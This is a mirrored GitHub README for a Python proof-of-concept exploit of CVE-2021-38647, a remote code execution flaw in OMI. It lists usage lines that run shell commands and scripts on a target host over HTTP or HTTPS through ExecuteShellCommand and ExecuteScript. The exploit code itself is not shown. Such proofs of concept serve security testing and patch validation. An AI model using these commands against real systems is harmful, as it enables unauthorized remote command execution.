X-n3t / cve-2021-38647

A PoC exploit for CVE-2021-38647 RCE in OMI

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

cve-2021-38647

A PoC exploit for CVE-2021-38647 RCE in OMI.

Execute a single command using ExecuteShellCommand on the default HTTPS port:

python cve-2021-38647.py -s 10.10.10.10 shell id

Execute a single command using ExecuteShellCommand on the default HTTP port:

python cve-2021-38647.py 10.10.10.10 -p 5985 shell id

Execute a single command using ExecuteScript on the default HTTPS port:

python cve-2021-38647.py -s 10.10.10.10 script -c id

Execute a script using ExecuteScript on the default HTTPS port:

python cve-2021-38647.py -s 10.10.10.10 script -f script.sh

About

A PoC exploit for CVE-2021-38647 RCE in OMI

License:MIT License


Languages

Language:Python 100.0%